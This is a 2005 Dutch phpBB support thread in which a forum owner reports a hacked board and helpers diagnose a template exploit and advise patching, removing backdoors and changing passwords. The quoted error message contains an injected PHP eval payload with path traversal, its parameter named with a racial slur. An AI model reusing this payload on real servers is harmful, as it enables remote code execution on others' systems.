Pagina 1 van 1

Mogelijk Gehackt Of Wat Anders??

Geplaatst: 18 mar 2005, 08:48
door JOTIN
Beste mensen,

Wij hebben een goed lopend forum (c.a. 800 bezoekende leden per dag)
Sinds het uitkomen van versie 2.0.11 is ons forum gelijk geupgrade.
Tot gisteren liep het goed.
Gisterochtend wilden we het forum bekijken en onze standaardscin (Chronicles) was ineens weg we hadden nu de layout van SubSilver
Inloggen ging niet meer (en door geen enkel lid)
Na het aanmelden van mezelf als nieuw lid kwam ik erachter dat Chronicles in de lijst welke men gebruikt voor het keizen welke layout men wil zien alleen SubSilver en F1black te kiezen was, dus Chronicles was weg.
F1 Black hebben we nooit geinstalleerd!!

De hostingmaatschappij heeft de backup die zij elke dag maken netjes terug gezet en het forum geupdate naar versie 2.0.13 daar dit volgen hun veiliger zou zijn.

Vanochtend was helaas het weer hetzelfde probleem aanwezig als gister.
Als ik probeer in te loggen krijg ik het volgende:
phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 335
File : /data/home/httpd/html/www.jotin.nl/HTML/phpBB2/includes/functions.php
Als ik dan na opnieuw "opstarten" van het forum onderin in de balk kijk wie online zijn dan sta ik daar zelf ook bij, maar kan niets doen en sta boven in niet als ingelogd.
Pas wanneer ik IEexplorer afsluit ben ik weer uit de aanwezigheids balk vandaan.
De wachtwoorden van de Admin (mijn vrouw en ik) worden gemiddeld elke dag gewijzigd en zeker na gisteren.
Verders heeft niemand Admin rechten.

Ik hoop dat iemand een passend antwoord heeft op dit probleem.

O.Ja ons forum staat op: http://www.jotin.nl/phpBB2/index.php


Groetjes JOTIN

Geplaatst: 18 mar 2005, 09:54
door mosymuis
Je forum is inderdaad gehackt, er is een nieuwe exploit bij je gebruikt die een combinatie van het 2.0.12 lek en een template truuc gebruikt om code uit te kunnen voeren op je server. Je had direct bij het uitkomen van de 2.0.13 release (28 februari) moeten updaten, dan was je dit niet gebeurd. Nu is het zaak je server te controleren op rare bestandjes (backdoors), de bewuste FI Black template asap te verwijderen als je dat nog niet gedaan had, en álle wachtwoorden te veranderen (ftp, cp, db en account).

Re: Mogelijk Gehackt Of Wat Anders??

Geplaatst: 18 mar 2005, 15:01
door Paul_
JOTIN schreef:Beste mensen,

Wij hebben een goed lopend forum (c.a. 800 bezoekende leden per dag)
Als ik op je teller en gebruikers lijst kijk zie ik: 3500 nedstat hits per week? (= 700 nedstat hits per dag) en 787 leden. Hoe kom je aan 800 bezoekende leden per dag?

Geplaatst: 18 mar 2005, 17:13
door Paul
Wil je alsjeblieft het © van phpbb.com terugzetten?

Geplaatst: 18 mar 2005, 17:15
door Bee
Dicht totdat een van de moderators is gePM'MED over het terugzetten van het copyright, het liefst naar mij, omdat ik weet waar je het over hebt dan.